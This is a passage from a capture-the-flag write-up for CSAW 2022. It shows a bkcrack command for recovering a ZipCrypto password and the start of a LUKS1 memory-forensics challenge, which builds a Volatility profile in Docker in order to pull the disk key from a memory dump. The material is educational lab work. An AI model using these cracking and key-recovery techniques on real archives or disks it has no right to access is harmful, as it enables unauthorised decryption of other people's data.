&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/8x38gOi.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;And the flag was:  &lt;code&gt;flag&amp;#123;1f_y0u_u53_z1pcryp70_4ny0n3_c4n_aud17_y0u&amp;#125;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;However if you want the hard way, you can retrieve the original password of the archive using the three keys, you might need to know the length though, or guess it. Tideous task…&lt;/p&gt;
&lt;p&gt;Anyways, here is the command you would use for that:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;bkcrack -k b2c4a24e f036ff3a 998f6727 -r 8..12 ?p&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;-r to specify the length, it can be a rough number or an interval.&lt;/p&gt;
&lt;p&gt;Sorry, I didnt bother to get the password 😃)&lt;/p&gt;
&lt;p&gt;It was a creative challenge. However I must say that we did not check the email content document at all lol!&lt;/p&gt;
&lt;h1 id=&#34;encrypted-disk-digital-forensics&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#encrypted-disk-digital-forensics&#34;&gt;#&lt;/a&gt; Encrypted Disk: Digital Forensics&lt;/h1&gt;
&lt;details class=&#34;info&#34;&gt;&lt;summary&gt;Description&lt;/summary&gt;&lt;div&gt;
&lt;p&gt;th31nk encrypted his disk and forgot the password, can you help him? Flag is what you find, no need to wrap&lt;/p&gt;
&lt;p&gt;HINT: Custom Profile&lt;/p&gt;
&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;Challenge Link &amp;amp; Author&lt;/p&gt;
&lt;div class=&#34;links&#34;&gt;&lt;div class=&#34;item&#34; title=&#34;Challenge Link&#34; style=&#34;--block-color:#2296fd;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xNnRJTHBaYTVHaXZZLVo4NGxybTg2VjhEQzVEV2FIemEvdmlldz91c3A9c2hhcmluZw==&#34; data-background-image=&#34;https://ctftime.org/media/events/logo_48.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xNnRJTHBaYTVHaXZZLVo4NGxybTg2VjhEQzVEV2FIemEvdmlldz91c3A9c2hhcmluZw==&#34;&gt;Challenge Link&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;CSAW 2022 - Encrytped Disk&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Author - Crazyman&#34; style=&#34;--block-color:#de2336;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9DcmF6eW1hbkFybXk=&#34; data-background-image=&#34;https://pbs.twimg.com/profile_images/1427918895424282628/NR5jaECn_400x400.jpg&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9DcmF6eW1hbkFybXk=&#34;&gt;Author - Crazyman&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;Crazyman Twitter Profile&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;In this challenge we got a disk image &amp;amp; a memory dump. The Description tell us that the user encrypted his disk and forgot the password! So we can understand that the memory dump will help us to decrypt the disk to get the flag! right?? Let’s Check what we have !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~$ file *&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;forensic.img: LUKS encrypted file, ver 1 [aes, ecb, sha1] UUID: 61478c6d-b04e-4f1a-aff6-b4bb3a29cfbe&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;memory.raw:   data&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;As you see we have LUKS encrypted file version1! I will say it again! it’s verion 1!!!&lt;br&gt;
Oh wait what is LUKS??!&lt;/p&gt;
&lt;p&gt;LUKS or the Linux Unified Key Setup is a disk encryption specification created by Clemens Fruhwirth in 2004 and was originally intended for Linux.&lt;br&gt;
While most disk encryption softwares implement different, incompatible, and undocumented formats, LUKS implements a platform-independent on-disk format for use in various tools. This not only faciliates compatibility and interoperability among different programs, but also assures that they all implement password management in a secure and documented manner. Per Wikipedia.&lt;/p&gt;
&lt;p&gt;Unlike most blogs say, you should stick with LUKS2 if you are applying it to your disk, since it provides an extra layer of security by storing the master key in the kernel directly. However LUKS1 masterkey gets loaded in the RAM when you try to unlock it, and that what we are going to grab from the memory dump!&lt;/p&gt;
&lt;p&gt;The encrypted master key is stored as plaintext in the LUKS header. However once we mount it and get prompted to enter a passphrase, at least one of eight (LUKS support up to 8 passphrases), the decrypted master key (AES) is loaded into the memory.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/GOTSIPB.png&#34; alt=&#34;&#34;&gt;&lt;br&gt;
&lt;em&gt;Image courtesy: MDPI&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;When we tried to use &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cDovL1ZvbGF0aWxpdHkucHk=&#34;&gt;Volatility.py&lt;/span&gt; against the memory dump we had some troubles finding the right profile.&lt;/p&gt;
&lt;p&gt;We are sure that this memory image is linux one, because we have LUKS. Let’s figure out what is the distrubition and the version to search or make our volatility profile to work with!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~$ strings memory.ram | grep &lt;span class=&#34;string&#34;&gt;&amp;quot;Linux version&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Linux version 4.4.0-72-lowlatency (buildd@lcy01-17) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) &lt;span class=&#34;comment&#34;&gt;#93-Ubuntu SMP PREEMPT Fri Mar 31 15:25:21 UTC 2017 (Ubuntu 4.4.0-72.93-lowlatency 4.4.49)&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Oh it’s &lt;span class=&#34;pinky&#34;&gt;Ubuntu 16.04.4&lt;/span&gt; with low-latency kernel! oh wait what? what did you mean by low-latency kernel?&lt;br&gt;
As I know there is various type of linux kernel like Real-tim kernel, generic kernel, Low-latency kernel&lt;br&gt;
This types of kernel varies in the type of the scheduler and their algorithm, as well as the system interuption… etc! None is better than the other! Each one has its use case.&lt;/p&gt;
&lt;p&gt;For example the low-latency one can reduce audio latency and the context switches are more frequent. This type of kernel has a scheduler that is not suitable for a server environment! But it will be good for a professional audio or video editing!&lt;/p&gt;
&lt;p&gt;Ok now i guess you get it ! It’s time to make our profile! In this demo we will make a volatility profile with low-latency kernel using docker container. It’s better than downloading a whole VM! Don’t waste time in that!&lt;/p&gt;
&lt;p&gt;Let’s download volatiltiy man&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~$ git &lt;span class=&#34;built_in&#34;&gt;clone&lt;/span&gt; https://github.com/volatilityfoundation/volatility&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Cloning into &lt;span class=&#34;string&#34;&gt;&amp;#x27;volatility&amp;#x27;&lt;/span&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;remote: Enumerating objects: 27411, &lt;span class=&#34;keyword&#34;&gt;done&lt;/span&gt;.&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Cceiving objects:   7% (1919/27411), 340.01 KiB | 652.00 KiB/s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;In Volatility repository there is  &lt;code&gt;/tools/linux&lt;/code&gt;  directory that contains tools that allow us to make a linux profile. In this directory there is a file called &lt;span class=&#34;pinky&#34;&gt;Makefile&lt;/span&gt; that contains important information ! Let’s check it!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~volatility/tools/linux/$ &lt;span class=&#34;built_in&#34;&gt;cat&lt;/span&gt; Makefile&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;obj-m += module.o&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;KDIR ?= /&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;KVER ?= $(shell &lt;span class=&#34;built_in&#34;&gt;uname&lt;/span&gt; -r)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;-include version.mk&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;all: dwarf&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;dwarf: module.c&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        $(MAKE) -C $(KDIR)/lib/modules/$(KVER)/build CONFIG_DEBUG_INFO=y M=&lt;span class=&#34;string&#34;&gt;&amp;quot;&lt;span class=&#34;subst&#34;&gt;$(PWD)&lt;/span&gt;&amp;quot;&lt;/span&gt; modules&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        dwarfdump -di module.ko &amp;gt; module.dwarf&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        $(MAKE) -C $(KDIR)/lib/modules/$(KVER)/build M=&lt;span class=&#34;string&#34;&gt;&amp;quot;&lt;span class=&#34;subst&#34;&gt;$(PWD)&lt;/span&gt;&amp;quot;&lt;/span&gt; clean&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;clean:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        $(MAKE) -C $(KDIR)/lib/modules/$(KVER)/build M=&lt;span class=&#34;string&#34;&gt;&amp;quot;&lt;span class=&#34;subst&#34;&gt;$(PWD)&lt;/span&gt;&amp;quot;&lt;/span&gt; clean&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;built_in&#34;&gt;rm&lt;/span&gt; -f module.dwarf&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Look at the  &lt;code&gt;KVER&lt;/code&gt;  variable , it contains your current kernel version! it’s an automatic kernel detection! in our case we will change it with the version of kernel that we will use it! Check the Linux Version from the output of the last strings command that we runed on the memory dump.&lt;br&gt;
change  &lt;code&gt;$(shell uname -r)&lt;/code&gt;  with  &lt;code&gt;4.4.0-72-lowlatency&lt;/code&gt; . Do it manually or use the magic of  &lt;code&gt;sed&lt;/code&gt;  command&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Sed Magic&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;4n6nk8s@csaw2022:~volatility/tools/linux/$ sed -i &lt;span class=&#34;string&#34;&gt;&amp;#x27;s/$(shell uname -r)/4.4.0-72-lowlatency/g&amp;#x27;&lt;/span&gt; Makefile&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now it’s time to run a &lt;span class=&#34;pinky&#34;&gt;Ubuntu 16.04.4&lt;/span&gt; docker container and mount the current direcotry that contains the tools to build the profile. We can use the variable environment $PWD to indicate the current path easly. Don’t waste your time writing the whole path man !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Command Line Prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;sudo docker run -it --&lt;span class=&#34;built_in&#34;&gt;rm&lt;/span&gt; -v &lt;span class=&#34;variable&#34;&gt;$PWD&lt;/span&gt;:/volatility ubuntu:16.04 /bin/bash&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Unable to find image &lt;span class=&#34;string&#34;&gt;&amp;#x27;ubuntu:16.04&amp;#x27;&lt;/span&gt; locally&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16.04: Pulling from library/ubuntu&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;58690f9b18fc: Downloading [=========&amp;gt;                                         ]  8.522MB/46.5MB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;b51569e7c507: Download complete&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;da8ef40b9eca: Download complete&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Just wait until the container is pulled &amp;amp; get your bash !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;The ubuntu container is ready&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;Digest: sha256:91bd29a464fdabfcf44e29e1f2a5f213c6dfa750b6290e40dd6998ac79da3c41&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Status: Downloaded newer image &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; ubuntu:16.04&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;root@507b1a4007ff:/&lt;span class=&#34;comment&#34;&gt;#&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Since our ubuntu container is ready to use. Let’s install the low-latency kernel and the essentials packages for building the profile.&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Install our packages&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;root@507b1a4007ff:/&lt;span class=&#34;comment&#34;&gt;# apt update &amp;amp;&amp;amp; apt install -y linux-image-4.4.0-72-lowlatency linux-headers-4.4.0-72-lowlatency build-essential dwarfdump make zip&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Get:1 http://security.ubuntu.com/ubuntu xenial-security InRelease [99.8 kB]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Get:2 http://archive.ubuntu.com/ubuntu xenial InRelease [247 kB]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Get:3 http://security.ubuntu.com/ubuntu xenial-security/main amd64 Packages [2051 kB]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Get:4 http://archive.ubuntu.com/ubuntu xenial-updates InRelease [99.8 kB]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Get:5 http://archive.ubuntu.com/ubuntu xenial-backports InRelease [97.4 kB]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Get:6 http://archive.ubuntu.com/ubuntu xenial/main amd64 Packages [1558 kB]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Get:7 http://security.ubuntu.com/ubuntu xenial-security/restricted amd64 Packages [15.9 kB]&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Ah man you’ll wait again until the installation is done! After the installation is finished let’s check our volatility tools inside the container then make the profile !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;Make The profile&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;root@507b1a4007ff:/&lt;span class=&#34;comment&#34;&gt;# ls&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;bin   dev  home        lib    media  opt   root  sbin  sys  usr  vmlinuz&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;boot  etc  initrd.img  lib64  mnt    proc  run   srv   tmp  var  volatility&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;root@507b1a4007ff:/&lt;span class=&#34;comment&#34;&gt;# cd volatility/&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;root@507b1a4007ff:/volatility&lt;span class=&#34;comment&#34;&gt;# ls&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Makefile  Makefile.enterprise  kcore  module.c&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;root@507b1a4007ff:/volatility&lt;span class=&#34;comment&#34;&gt;# make&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;make -C //lib/modules/4.4.0-72-lowlatency/build CONFIG_DEBUG_INFO=y M=&lt;span class=&#34;string&#34;&gt;&amp;quot;/volatility&amp;quot;&lt;/span&gt; modules&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;make[1]: Entering directory &lt;span class=&#34;string&#34;&gt;&amp;#x27;/usr/src/linux-headers-4.4.0-72-lowlatency&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  CC [M]  /volatility/module.o&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  Building modules, stage 2.&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  MODPOST 1 modules&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  CC      /volatility/module.mod.o&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  LD [M]  /volatility/module.ko&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;make[1]: Leaving directory &lt;span class=&#34;string&#34;&gt;&amp;#x27;/usr/src/linux-headers-4.4.0-72-lowlatency&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;dwarfdump -di module.ko &amp;gt; module.dwarf&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;make -C //lib/modules/4.4.0-72-lowlatency/build M=&lt;span class=&#34;string&#34;&gt;&amp;quot;/volatility&amp;quot;&lt;/span&gt; clean&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;make[1]: Entering directory &lt;span class=&#34;string&#34;&gt;&amp;#x27;/usr/src/linux-headers-4.4.0-72-lowlatency&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  CLEAN   /volatility/.tmp_versions&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  CLEAN   /volatility/Module.symvers&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;make[1]: Leaving directory &lt;span class=&#34;string&#34;&gt;&amp;#x27;/usr/src/linux-headers-4.4.0-72-lowlatency&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now let’s zip the result of the make command (module.dwarf) and the system map file from the  &lt;code&gt;/boot&lt;/code&gt;  :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;The system map file contains the Symbols that will be used by volatility to run the plugin correctly. It list function entry points and addresses of kernel data structures of a particular build of a kernel!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The  &lt;code&gt;module.dwarf&lt;/code&gt;  contains the  &lt;code&gt;vtypes&lt;/code&gt;  of this kernel module! To make we can call  &lt;code&gt;vtypes&lt;/code&gt;  as the kernel’s data structures. To make it more easy  &lt;code&gt;vtypes&lt;/code&gt;  is a small library to define  &lt;code&gt;Validating Types&lt;/code&gt;  that will be used by the kernel !&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Why we zip the  &lt;code&gt;module.dwarf&lt;/code&gt;  and the  &lt;code&gt;System.map&lt;/code&gt;  file? It’s simple man! These two files represent the whole profile that will be used by volatility! Volatility requires these 2 files to be in zip to deal with it as profile! Wow man, our profile is coming!&lt;/p&gt;
